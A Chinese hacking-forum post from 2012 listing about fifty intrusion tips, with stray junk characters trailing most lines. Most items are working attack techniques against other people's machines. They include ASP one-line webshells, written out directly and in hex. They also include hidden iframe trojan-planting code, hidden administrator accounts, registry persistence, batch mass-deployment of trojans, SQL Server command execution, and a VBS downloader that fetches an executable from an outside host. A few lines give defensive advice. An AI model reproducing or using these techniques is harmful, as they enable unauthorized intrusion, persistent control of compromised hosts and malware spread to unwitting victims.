找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2383|回复: 0
打印 上一主题 下一主题

一些笔记

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:51:03 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
1、Xp系统修改权限防止病毒或木马等破坏系统,cmd下,
0 w5 N1 m# k$ [* e" Z6 Bcacls C:\windows\system32 /G hqw20:R' u' e( C; Q3 @% T/ C; D; @
思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入# h+ I* i2 [, k, _: o+ ]3 v
恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F
/ g; o6 N$ A( w# J# u" S" J7 Q9 j! }' e7 [8 [/ w
2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。  [" k5 s8 b; u+ d/ G
* m6 D4 Z, c7 S$ ?2 A; ]/ k
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。# g+ T8 X6 C9 h+ B4 L+ g4 J
$ e0 a7 w, `5 c, K: r9 Z
4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
8 J. K7 Y/ G- y+ e/ s6 B( h# K+ L$ t5 I0 I2 {( E2 e0 z# o8 X
5、利用INF文件来修改注册表7 B- W5 ~+ M( O6 t* c6 d
[Version]
: p! N7 o6 a& r+ @- ]. T, t2 CSignature="$CHICAGO$"& U/ b# X" ~6 |
[Defaultinstall]
1 o/ W# J, M) Q% ]6 f1 KaddREG=Ating
; ]4 ?4 d# y$ r) S1 n3 D  J[Ating]
9 ^* G* ~* n' X6 Z  tHKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"* [" J, g7 e# v* N
以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:
( V8 ]# ^5 _8 m# S9 s' Erundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径
; w( T0 M9 K# b1 a# G: F2 Z其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU+ o/ J3 E6 h7 Q  f$ U: o( w( V# s
HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU8 s( ]7 _0 e5 A
HKEY_CURRENT_CONFIG 简写为 HKCC$ m' g# y7 @6 S8 B, d+ Q: a3 X+ x
0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值2 i# M& n( z! y$ f
"1"这里代表是写入或删除注册表键值中的具体数据
) _+ O0 }0 g$ ~- C- }$ d) Z% c7 J. F8 h6 D7 C  E4 e: E
6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,
1 ?1 l  t& b1 A; Z+ R. A* l2 s多了一步就是在防火墙里添加个端口,然后导出其键值2 M  W( T/ @9 w- _- H6 ~+ o
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
; Z8 A* O" X9 ]8 o% X! o2 M' n# |1 [! e) M
7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽! w. q. m) q4 t( k# }
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。
( O  O0 F7 D& g, `& q# H! s$ A+ l' m+ m
8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。5 W& s- }6 _5 J! p$ v* R

/ K' S' N  E6 t& |6 P. v$ G9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,0 U6 d$ H! x+ I7 ?
可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。! \3 q, a- y; O5 ~% U: N* q  y
' S* x) I, B5 T! |* Y
10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”
& b( y% q# R, G, O
* h2 ~* c0 _- `+ a+ f6 G11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
: j. s  N6 Q/ |3 f; I" {  ?/ q8 y用法:xsniff –pass –hide –log pass.txt3 W4 r7 f3 f6 J" w$ |/ A
, ]7 ~# {! I5 c* I
12、google搜索的艺术1 j, \' `$ t# a: U1 @. n
搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
+ N  n' g2 t/ d% N; h& X  \& O或“字符串的语法错误”可以找到很多sql注入漏洞。
+ k! H: Q! {. _" q$ r9 o
8 s' I! O% Z/ H3 f13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。& s' C& K/ O7 h+ x! a. y

( |7 d1 e8 K: @# P14、cmd中输入 nc –vv –l –p 1987
& _7 x2 j) U$ _% ~- h) j, l5 G做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
$ m2 M3 }# v, T; P4 `
# B0 @/ `9 y- T9 D  O, Q/ j! n15、制作T++木马,先写个ating.hta文件,内容为0 [/ o8 U: {9 X; Z& O; f# I
<script language="VBScript">; i( g- b# a' h4 e- J0 v. m
set wshshell=createobject ("wscript.shell" ); w% ~3 N8 p% V& [6 x2 `
a=wshshell.run("你马的名称",1)
" B$ I1 z9 v$ V# f7 |window.close
4 X5 q5 P- @8 y</script># F2 V- A; C$ v6 l4 m; E
再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
2 F- D. o2 L* |  w( B, H9 l* _8 I' n
$ Y* Y/ L4 w3 ]/ Q; {16、搜索栏里输入
) h$ _; o3 p" W' T; w0 ^# ?关键字%'and 1=1 and '%'='
( p6 z0 q" O5 f3 w: t+ [关键字%'and 1=2 and '%'='$ I' F% t# x# s
比较不同处 可以作为注入的特征字符, k% g8 J, s: q) x  K6 t" S
) c% O$ `! w2 i8 m% u
17、挂马代码<html>1 O9 \0 K  X3 s. e( h! K
<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>0 M( W9 |$ P0 {" }1 m# Y: M
</html>0 j1 z. P2 J, u, R6 W  x

# g! ^4 |# d+ j18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,  X  }0 s% m7 N7 J" h
net localgroup administrators还是可以看出Guest是管理员来。
) X' F: A' z5 I/ k+ N, ]3 m% p& L( A! E% |$ Y' `. }# f' ~+ r
19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等  R, V4 P0 s% s! `2 ]
用法: 安装: instsrv.exe 服务名称 路径6 ]0 J; F% R# j$ a- e
卸载: instsrv.exe 服务名称 REMOVE
+ D' U) D7 U* h6 }# ]& ?7 a6 [; l6 H' c: Q
$ @! b# _% }* \! s; E6 L  V- @' h
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉
" E7 ]0 j& B  H& e! _不能注入时要第一时间想到%5c暴库。+ R. g9 ~: f9 X( a: e* z# C
" F7 U: R: w) t
22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~
* K9 l% H2 k. a; a" k5 E9 M, E, b- ^. r. b" i
23、缺少xp_cmdshell时
0 a$ S! n# |% @! u- M4 u! ~尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'% E! l' e9 f9 f  |
假如恢复不成功,可以尝试直接加用户(针对开3389的)
9 o( h% i8 j) @+ p- F! bdeclare @o int) i4 c# T/ v  e9 C! f
exec sp_oacreate 'wscript.shell',@o out
0 n- t: |: I$ s  rexec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员4 o. J( V& E' B( z  i; d& Y

' n' i. ^$ `2 X$ q& U) G" N24.批量种植木马.bat0 t% B+ n5 j9 p, \1 Z4 \
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
4 u- P, p1 j" I# C: g! gfor /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
4 g. E3 X9 y. {: U扫描地址.txt里每个主机名一行 用\\开头
' f+ t  {2 r5 M- t2 X; P) j7 Z
' W! \( ^  u/ F$ X9 H25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。" M! R7 A, d, K) ?( V% R0 V& q0 {

* U9 }, f  r1 _3 \; a/ z, q26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
$ q1 s$ N- o$ ^. a. a将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.; H- U6 c4 a$ I* H$ H) H
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马
- r. R# s3 ]9 q, [4 E: C+ H2 c8 ]+ m  h4 L; V! y
27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP; E* i' H& ~1 B2 R2 \* R8 u' |+ }
然后用#clear logg和#clear line vty *删除日志) B' Y4 V1 D8 l
( p& k0 I; p- t
28、电脑坏了省去重新安装系统的方法, W  P. o! T) s& |5 q% k+ `9 Y
纯dos下执行,- K4 ~, D5 O9 i- Q8 X7 M! J  q
xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config
% ?0 }4 |. j: F& t2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config
0 U& `: }) \8 F6 f
2 G. v( Z; n$ r8 \5 {/ B29、解决TCP/IP筛选 在注册表里有三处,分别是:
& C. d* L; L. e: g' z5 WHKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
0 \7 y7 I9 m, s, sHKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
+ _( Z0 |1 }' r8 L( F: t, L; NHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip( g' i/ J- s, z/ {) {9 B% r
分别用! t( B- i, ]2 {$ @' W* n  d$ Z, U9 z
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
% I' y4 d1 A8 z3 u6 |" ^# L9 O6 mregedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip4 o$ q7 B0 y8 B5 }' W+ E
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip; s2 d$ l6 O  I1 \( B: k
命令来导出注册表项
, G# F+ X# b. Q  s9 S8 X然后把三个文件里的EnableSecurityFilters"=dword:00000001,: E7 x( f, N5 J* Z1 e
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用
! M$ @6 j( w, C" N7 W& p# ~regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。# ?+ I7 b1 \# I

# K) {1 S. \+ o, w$ a( B. ^30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
. t7 _' b8 r* o7 `, OSER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3
! A) X9 L2 a( V" z( f/ f. b+ B: x; T( }7 Y* l& @
31、全手工打造开3389工具
2 Z' ?- r$ i! c: b! r: ~2 W0 H打开记事本,编辑内容如下:% N* a2 T' b- K% d' O
echo [Components] > c:\sql) S* o4 K1 @& E0 z' Y5 P% E; D
echo TSEnable = on >> c:\sql
! J. v( E1 u+ `! V3 F; jsysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
( w+ A* E0 Y9 B. f3 Q0 P+ T编辑好后存为BAT文件,上传至肉鸡,执行* U8 t0 G: m! [% P; o9 N

' y5 W: [  |% [" }! Z3 R32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马
. S: r; D' y( S1 P
( ?* r: Z3 S$ o1 m33、让服务器重启! Y# Z. s  W. i0 ]! U
写个bat死循环:
( ^$ {7 F2 |* L3 K9 g' l. E@echo off
  D/ r" U! n# b* u, ~% J2 g6 J:loop13 E4 p+ u$ M# P- q
cls
' w* w9 k, d5 N+ dstart cmd.exe
- F1 M  l4 S% ?6 x7 N4 agoto loop1. z  ?7 H+ `9 J. M
保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启8 t! w) U4 z) H1 |* d+ Q) J
9 ~" I3 p, y' q8 M; a6 G
34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,2 Z" M5 s! Q" R6 |
@echo off
4 L4 i  d0 K8 _! A4 a8 ]7 F# Ddate /t >c:/3389.txt
6 {: U3 w8 A0 F& Htime /t >>c:/3389.txt
* Q  p0 r, A! _/ v3 [, e5 _3 fattrib +s +h c:/3389.bat5 o# b; W3 {1 j
attrib +s +h c:/3389.txt, Y) r5 s1 u! `. f
netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
$ I4 }+ w" |' d4 ^  B- B& S并保存为3389.bat
/ t1 w& z9 @7 ]( ^% X, F9 T# J打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号7 G! A' e! t& r, }
" [0 y0 y1 {) g- `
35、有时候提不了权限的话,试试这个命令,在命令行里输入:; P7 o4 t( ?' e) }- B$ R  f0 k* O
start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)
& a' i, C" n* y. Z% B输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。& D/ i! A6 q5 Y$ G% k
3 z+ t2 ~& k) C2 u* \2 n
36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
# p4 P; S4 S4 K( C$ E) mecho open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址" ]7 m3 q1 W: j3 V$ z
echo 你的FTP账号 >>c:\1.bat //输入账号
1 B9 d% Z* s- G- f7 y8 Oecho 你的FTP密码 >>c:\1.bat //输入密码4 \- l' _! _+ h6 o" i
echo bin >>c:\1.bat //登入
" h( n2 z* i! Eecho get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么( E7 L5 s8 {) l& a$ P# I
echo bye >>c:\1.bat //退出
% }# n. k- L2 g( \$ B然后执行ftp -s:c:\1.bat即可7 M1 Z* ]0 S; i' `

' t+ r* ]; g  R( m8 A" ~- y! p37、修改注册表开3389两法/ W  s$ \" v  j& s, u# ]& }, i
(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表+ K: ^4 v/ T' ]& W# L  v
echo Windows Registry Editor Version 5.00 >>3389.reg: [% `0 f2 Z# ]* E# D* [( [' W
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
3 t! q) n3 ^, {4 z/ V3 C! Necho "Enabled"="0" >>3389.reg
6 O4 S$ n6 }/ W2 _. W6 Uecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows: }+ I  w% q: [/ _2 n
NT\CurrentVersion\Winlogon] >>3389.reg4 c3 }0 g7 A3 {
echo "ShutdownWithoutLogon"="0" >>3389.reg
/ X: g+ N  y% k. A# R$ Iecho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]) N, ?5 O, @; Z, d$ ~2 t7 {$ |
>>3389.reg9 b9 R4 L( E( U
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg* H2 t6 a" h& R8 a% d7 k% _- v
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]9 j$ a3 {( Y9 V! m, P5 _% J
>>3389.reg
5 T' i; {# D# f" E: Hecho "TSEnabled"=dword:00000001 >>3389.reg
: q4 ~/ m( e- Z0 f! w1 O# Secho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg' R4 ]* n$ T5 c, `, i
echo "Start"=dword:00000002 >>3389.reg
+ C2 C# |, B; ~: R# x8 Techo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]; o% n4 l( g; W; K8 h( g8 F' e5 J' X  r
>>3389.reg
9 R6 E4 E' F/ {" W* fecho "Start"=dword:00000002 >>3389.reg
  p, `) z4 ?- jecho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg6 j& `9 M$ ~: o& j# _
echo "Hotkey"="1" >>3389.reg
- R- O& k$ T- O  _/ ]6 {echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal* F0 g' S! e" `, b) Q/ e) T# r
Server\Wds\rdpwd\Tds\tcp] >>3389.reg( x% D: O2 K0 k- j
echo "PortNumber"=dword:00000D3D >>3389.reg; o  K" t7 q% X: |0 k
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal- a: Q3 j! ?! y
Server\WinStations\RDP-Tcp] >>3389.reg
4 N. G1 u" d1 h+ \. B7 M( A- P/ Fecho "PortNumber"=dword:00000D3D >>3389.reg
# ]- ~: D1 z& S9 N9 E把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。
: ?/ ]4 `5 o; c( E- O% M(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)8 a& o3 Z6 n" I+ q& Y
因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效" e' i* _  [3 L/ U% c; D( M  E
(2)winxp和win2003终端开启
* q& ?5 \6 E  Y4 E+ B5 U! N用以下ECHO代码写一个REG文件:
+ p. q/ g0 r4 M7 cecho Windows Registry Editor Version 5.00>>3389.reg
' [5 c9 o" a% h7 d) D8 @( Wecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
9 |. o( G, D0 t) x) `Server]>>3389.reg
1 A7 l. n6 M- oecho "fDenyTSConnections"=dword:00000000>>3389.reg: ~9 Y2 i( ]0 E' x
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
' U6 E$ z, M4 U9 @! Q* vServer\Wds\rdpwd\Tds\tcp]>>3389.reg
5 Z4 e6 t3 Z/ Oecho "PortNumber"=dword:00000d3d>>3389.reg  Y8 U0 }* e) x  s
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal: F! A- ~- Y4 N  x) d6 M7 `
Server\WinStations\RDP-Tcp]>>3389.reg
; l/ R1 C/ q5 E4 R) g' k% Pecho "PortNumber"=dword:00000d3d>>3389.reg
' F# Z2 T, t) o3 |然后regedit /s 3389.reg del 3389.reg' Y6 E0 ^# U2 |/ t
XP下不论开终端还是改终端端口都不需重启
1 c4 G- B# F9 s2 ^0 n  h8 B3 Z' `6 h" A& H! L( o$ F
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃7 v' ~9 V; ~2 f& i' y
用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'
- L; ~9 F9 X+ \* q$ O( s& b3 S1 _) A  E
39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!' B/ }+ g* ]% ?9 A: K; p9 |: J6 s
(1)数据库文件名应复杂并要有特殊字符
0 @0 B. e3 h8 e- X! a& r4 \(2)不要把数据库名称写在conn.asp里,要用ODBC数据源  f! f7 e3 _3 ~4 r& g
将conn.asp文档中的
& k9 ?. y" o  |4 ADBPath = Server.MapPath("数据库.mdb")
& S+ x, z. [9 \0 O- J& \6 ~0 N7 yconn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath  T/ k4 Q% y" s4 \& J

& W8 k# [3 |! X; F修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置
, |. \: c7 A6 i/ j  W) z% G(3)不放在WEB目录里
1 I! @' @( G. g4 o! g6 f( ]9 @$ t) _) e" X5 O
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉/ W( |% ~8 \. c+ h0 @- ?6 E: j
可以写两个bat文件
5 I/ v0 o; I( o1 ^@echo off) `5 A& B; C, `' T9 y
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe( }  ]4 v, \+ {0 S5 ^
@del c:\winnt\system32\query.exe7 i: |3 W6 k& F. \  c/ K$ ~
@del %SYSTEMROOT%\system32\dllcache\query.exe% b, {5 O7 B5 h
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的
- n& O7 [9 m) E$ O6 s4 h3 M$ o" J7 V" V) o5 [, F
@echo off
% M' B8 o4 [  J" X% s% w@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe; h5 j/ W6 q0 A0 t# z5 G2 v- L
@del c:\winnt\system32\tsadmin.exe3 o. {( K5 e& _% e
@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex
' ]: g7 z3 u) X" b: C9 v6 o& h" h2 S4 r  q: L
41、映射对方盘符! M6 V  J" a( w, c7 w# k. h
telnet到他的机器上,
/ I5 \2 X' h) y$ m7 L( Anet share 查看有没有默认共享 如果没有,那么就接着运行
5 y& M5 `) K/ Z/ y9 }. Y; i2 Snet share c$=c:# s  X8 o  j0 U( G6 V( `: _% ?
net share现在有c$, m8 v1 Y2 s9 q0 T1 K9 a
在自己的机器上运行
: _% b0 G# ?& L( s) n# J! I9 \: x; Dnet use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
& R9 H# K% D. x
! Q2 A( h. H4 m8 X/ Y; y, n# a42、一些很有用的老知识
4 C" N3 s* h6 P* Atype c:\boot.ini ( 查看系统版本 )6 l5 Y8 q" i) |9 i
net start (查看已经启动的服务)
3 i& f  Y" `9 }query user ( 查看当前终端连接 )
5 Y5 ?" |7 f0 c0 W  vnet user ( 查看当前用户 )
  R1 G! H1 ?; c2 w3 k' G% snet user 用户 密码/add ( 建立账号 )
: i; Z6 o8 U$ Q9 g3 X+ }" {net localgroup administrators 用户 /add (提升某用户为管理员)( y/ L# c) n5 R: U# x; z9 u
ipconfig -all ( 查看IP什么的 ), M) \' |3 H: k- i6 y8 x) u% R& n
netstat -an ( 查看当前网络状态 )
* Z2 u* |& v$ x, S3 Efindpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
! x& [0 P/ Q6 T7 p. I* b5 \$ C1 z克隆时Administrator对应1F4
$ W' p1 J! C7 @/ zguest对应1F5+ i* I7 V6 a$ Y9 g, V/ [
tsinternetuser对应3E85 u% ?4 E: D/ k- m
" N2 Y9 [: |' u1 v9 O5 A& z
43、如果对方没开3389,但是装了Remote Administrator Service
5 ]8 b4 ~: ~* G/ E2 l# @3 h用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接% i1 H- l+ o$ D; n' X+ @  H% W
解释:用serv-u漏洞导入自己配制好的radmin的注册表信息. G) F9 X1 @5 @  j8 w9 a
先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"
3 }' o' s# h; k# f7 `2 o' g) T# V  }7 Y: r9 Q
44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)
3 v5 [$ Y, V+ Z* e- D( I本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
# T- c4 n/ k+ C
+ P4 p1 z0 D! m5 q45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)( V( K+ w& {/ }% P& B" |. Z
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open+ b. ^. m0 U. {# [9 I0 c3 b0 A
^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =& `, Q5 l3 G0 E4 Q
CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
2 C( A* p2 v& p5 ?) T% I$ v, O$ d1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
; V% x$ n3 c& b# ^(这是完整的一句话,其中没有换行符)
7 u" A- ^& Y* b+ ?然后下载:+ u8 _7 p' P1 i& z
cscript down.vbs http://www.hack520.org/hack.exe hack.exe
9 C: x! G. H! C, I) }6 ^2 c# n( e( g+ ^' B0 M4 ?# C0 K3 Y  o2 i" U  F
46、一句话木马成功依赖于两个条件:, a7 k( u# }, }2 d0 f1 ]8 R
1、服务端没有禁止adodb.Stream或FSO组件
+ s# K* h: V% ~) q' ^' T: r- E0 ~2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
) e/ [; g: o+ D; V3 V# S
1 X% @# i9 [2 P' ^- z47、利用DB_OWNER权限进行手工备份一句话木马的代码:! ?" b) v( b$ J0 `, o- c$ b
;alter database utsz set RECOVERY FULL--
! ^; U5 ]0 k  G% N/ L7 U;create table cmd (a image)--
7 S4 z; Z9 Z& C# g;backup log utsz to disk = 'D:\cmd' with init--
( ?3 q2 J, P5 ~/ ~) J! G9 S;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--/ ~3 m0 n( c* ^, C, B
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--% X" f' o: w. r) s+ _: e" k! ~1 Q
注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。7 [5 c* l% r1 S9 c' \! g/ q( P5 R/ W

8 L% Z+ y: d% H4 z9 e& I48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
1 ~3 l% r! s+ `+ H0 T" G+ h
) E& y5 w! `* [) U$ ?; T! }0 c用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
1 j8 z5 O" G- F/ I8 O0 U  I所有会话用 'all'。1 k. ]5 W, S' R3 j9 i3 N$ y
-s sessionid 列出会话的信息。9 M* _1 l% V+ o5 \7 X
-k sessionid 终止会话。
# p% n& h& i+ D0 W; u-m sessionid 发送消息到会话。: [, m( {, ~6 h6 [5 J
- I4 @* b( K2 d0 l4 A* A& X
config 配置 telnet 服务器参数。% C  J/ q- O3 s5 y9 b

; `9 ]( t7 R9 D) w) X# d/ @/ m- qcommon_options 为:
$ x, G/ s% \/ |6 C" }-u user 指定要使用其凭据的用户
$ Q1 F! k$ u0 ^9 R* }0 X-p password 用户密码
5 B# ?5 L, G/ ^7 l( L7 S+ T6 q& _$ }9 @) v5 W# V
config_options 为:& E5 T. Z- i9 @0 o6 Q* _9 h
dom = domain 设定用户的默认域" X( _% A1 ~6 \* _
ctrlakeymap = yes|no 设定 ALT 键的映射5 m! Y: a0 ]7 f
timeout = hh:mm:ss 设定空闲会话超时值
6 J0 U! s$ a6 ~+ p' f* Ntimeoutactive = yes|no 启用空闲会话。
  z' C6 n9 U  O% {0 b; _% zmaxfail = attempts 设定断开前失败的登录企图数。
% T* o' x; Z: A7 _maxconn = connections 设定最大连接数。
/ j- k/ Y- |7 X! R7 G( X% w2 fport = number 设定 telnet 端口。2 j4 ~3 Y- j- M& h6 n
sec = [+/-]NTLM [+/-]passwd
7 O; S7 z4 L3 o0 ]6 b设定身份验证机构: R% G. m5 x. J# q8 Q: N0 z
fname = file 指定审计文件名。
4 k0 S% j# Q( w$ ?! ]; rfsize = size 指定审计文件的最大尺寸(MB)。1 J0 U9 s- w/ b) W
mode = console|stream 指定操作模式。
- y' f3 `' F) ?auditlocation = eventlog|file|both: T0 g# c, @! [3 h; S  d
指定记录地点/ @3 }! }% H4 S% Y! A. h! L
audit = [+/-]user [+/-]fail [+/-]admin0 W. s; J% j) T) _7 r

' I3 [6 q1 n2 E# \0 U49、例如:在IE上访问:
. G; t2 c) G  F6 \! o( \1 mwww.hack520.org/hack.txt就会跳转到http://www.hack520.org/
. G8 l3 f) w) fhack.txt里面的代码是:/ n2 V+ `3 z4 y' n- e9 z
<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">
$ f- A" }4 ]6 H# f把这个hack.txt发到你空间就可以了!
" F6 s, y: P$ a7 i* W: m. J这个可以利用来做网马哦!1 C0 ]; Y! Q& s  [
$ j* q9 X! k5 y0 \+ V
50、autorun的病毒可以通过手动限制!
9 i! c- m3 i$ i) `/ Q1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!
4 e6 |; ]; D5 O# N7 i: W0 D9 U2 ^# n2,打开盘符用右键打开!切忌双击盘符~: d6 L) r% D& u& I, T  b% |
3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!# f, P# y0 W3 t5 y7 j

1 `3 C( _9 G0 a51、log备份时的一句话木马:/ r4 b" v3 U8 e3 s" v* e- s
a).<%%25Execute(request("go"))%%25>0 L+ z* I8 x& e7 T
b).<%Execute(request("go"))%>0 V/ v7 l! I0 _6 b
